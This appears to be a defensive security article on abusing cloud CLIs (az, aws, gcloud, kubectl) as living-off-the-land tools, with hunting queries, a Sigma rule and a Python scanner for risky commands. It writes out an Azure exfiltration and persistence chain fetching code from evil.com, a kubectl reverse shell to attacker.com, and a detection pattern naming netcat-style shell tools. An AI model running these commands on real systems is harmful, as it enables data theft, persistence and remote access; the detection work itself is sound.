Build Your Own Cloud LOLBin Scanner: A Python Script for Detecting Risky CLI Commands
Cloud LOLBins: The Next Frontier of Living Off the Land
If Windows gave us certutil, the cloud gave us az, aws, and gcloud: pre-authenticated, pre-installed, and perfectly trusted.
Top 10 Cloud LOLBins (2025)
| Tool | Platform | Malicious Use | MITRE |
|---|---|---|---|
| az (Azure CLI) | Azure | Exfil via az storage blob upload, run commands via az vm run-command | T1071, T1059 |
| aws | AWS | S3 exfil, Lambda backdoor, SSM remote exec | T1567, T1059.006 |
| gcloud | GCP | Secret Manager dump, GCE instance abuse | T1552 |
| kubectl | Kubernetes | Pod exec, secret theft, port-forward | T1059.008 |
| terraform | Multi-cloud | State file exfil, provider abuse | T1486 |
| packer | CI/CD | Image backdoor injection | T1036 |
| helm | K8s | Malicious chart deployment | T1525 |
| doctl | DigitalOcean | Droplet snapshot exfil | T1567 |
| oc (OpenShift CLI) | RHEL | Project enumeration, pod shell | T1087 |
| gh (GitHub CLI) | GitHub Actions | Repo secrets dump | T1552.005 |
Real-World Attack Chain (Azure Example)
```bash
# 1. Attacker lands on compromised Azure VM (CLI pre-auth'd via Managed Identity)
whoami # azuread\system
# 2. Enumerate subscriptions
az account list --output table
# 3. Exfiltrate data via Storage Account (no egress firewall trigger)
az storage blob upload \
  --account-name targetstorage \
  --container-name loot \
  --name db_backup.bak \
  --file /etc/passwd \
  --auth-mode login
# 4. Persistence via Automation Runbook
az automation runbook create \
  --resource-group rg-prod \
  --automation-account-name auto-prod \
  --name backdoor \
  --type PowerShell \
  --content 'IWR http://evil.com/ps1 | IEX'
```

Kubernetes kubectl LOLBin One-Liner

```bash
# Get shell in any pod — no kubectl binary needed if already in cluster
kubectl exec -it $(kubectl get pods -n default -o jsonpath="{.items[0].metadata.name}") -- sh -c "nc -e /bin/sh attacker.com 443"
```

Defense & Hunting (Blue Team)
```kusto
// Hunt az CLI exfil and remote execution (az runs as az.cmd on Windows hosts)
DeviceProcessEvents
| where FileName in~ ("az", "az.cmd")
| where ProcessCommandLine contains "storage blob upload"
    or ProcessCommandLine contains "run-command"
```

CloudTrail + Sigma: AWS CLI abuse
```yaml
logsource:
  product: aws
  service: cloudtrail
detection:
  selection:
    eventSource: ssm.amazonaws.com
    eventName: SendCommand            # the CloudTrail event behind SSM Run Command
    userAgent|contains: aws-cli        # call made with the AWS CLI
    sourceIPAddress: '<ec2-instance-ip>'   # placeholder: your instance or NAT IPs
  condition: selection
```

2025 Trend: LOLBins in Serverless
```bash
aws lambda invoke --payload file://payload.json backdoor.zip
gcloud functions call backdoor --data '{"exec":"whoami"}'
```
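The hunting queries above match one string at a time; the following added example (not code from the original post) is a small Python scanner that applies the table's rule set to captured process command lines, including the serverless one-liners just shown. It splits pipelines and `$(...)` subshells, matches subcommand prefixes per CLI, and flags shell or network tools passed to `kubectl exec`. The technique IDs come from the table except the gcloud functions rule, whose ID is assumed here, and the `az.cmd`/path normalisation assumes POSIX-quoted command lines.

```python
import itertools
import re
import shlex
from os.path import basename
# Rules: (binary, subcommand prefix, technique ID as listed in the table above, what it indicates)
RULES = [
    ("az", ("storage", "blob", "upload"), "T1071", "blob upload (possible exfil channel)"),
    ("az", ("vm", "run-command"), "T1059", "remote command on a VM"),
    ("az", ("automation", "runbook", "create"), "T1059", "runbook created (persistence)"),
    ("aws", ("ssm", "send-command"), "T1059.006", "SSM remote command"),
    ("aws", ("lambda", "invoke"), "T1059.006", "Lambda invoked from the CLI"),
    ("gcloud", ("functions", "call"), "T1059", "Cloud Function invoked (ID assumed here)"),
    ("kubectl", ("exec",), "T1059.008", "exec into a pod"),
]
SEPARATORS = {"|", ";", "&&", "||"}              # whitespace-delimited shell separators
SUBSHELL = re.compile(r"\$\(([^()]*)\)")          # innermost $(...) first
IN_POD_SHELL = re.compile(r"(?<!\w)(nc|ncat|socat|bash -i|/dev/tcp)(?!\w)")

def _norm(tok):
    """'/usr/bin/az' or 'az.cmd' -> 'az' (assumes POSIX-quoted command lines)."""
    return re.sub(r"\.(cmd|exe|bat)$", "", basename(tok).lower())

def _commands(cmdline):
    """Yield each simple command as a token list, recursing into $(...) subshells."""
    while (m := SUBSHELL.search(cmdline)):
        yield from _commands(m.group(1))
        cmdline = cmdline[:m.start()] + "SUBSHELL" + cmdline[m.end():]
    cmd = []
    for tok in shlex.split(cmdline) + ["|"]:      # trailing "|" flushes the last command
        if tok in SEPARATORS:
            if cmd:
                yield cmd
            cmd = []
        else:
            cmd.append(tok)

def scan(cmdline):
    """Return [(technique, detail)] for every risky cloud CLI use in one command line."""
    findings = []
    for cmd in _commands(cmdline):
        binary = _norm(cmd[0])
        # subcommand words are the positional tokens before the first option
        positional = tuple(itertools.takewhile(lambda t: not t.startswith("-"), cmd[1:]))
        for rule_bin, prefix, technique, detail in RULES:
            if binary == rule_bin and positional[:len(prefix)] == prefix:
                findings.append((technique, f"{binary}: {detail}"))
        if binary == "kubectl" and "--" in cmd:   # everything after "--" runs inside the pod
            in_pod = " ".join(cmd[cmd.index("--") + 1:])
            if IN_POD_SHELL.search(in_pod):
                findings.append(("T1059.008", f"kubectl: shell/network tool in pod: {in_pod}"))
    return findings
```

Feed it the `ProcessCommandLine` column exported from your EDR and the enumeration step (`az account list`) yields nothing while the upload, runbook and pod-exec steps each produce a finding.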
Final Word
The cloud is the new OS. Its CLI tools are the new LOLBins.
Monitor command-line + identity + network context — not just file drops.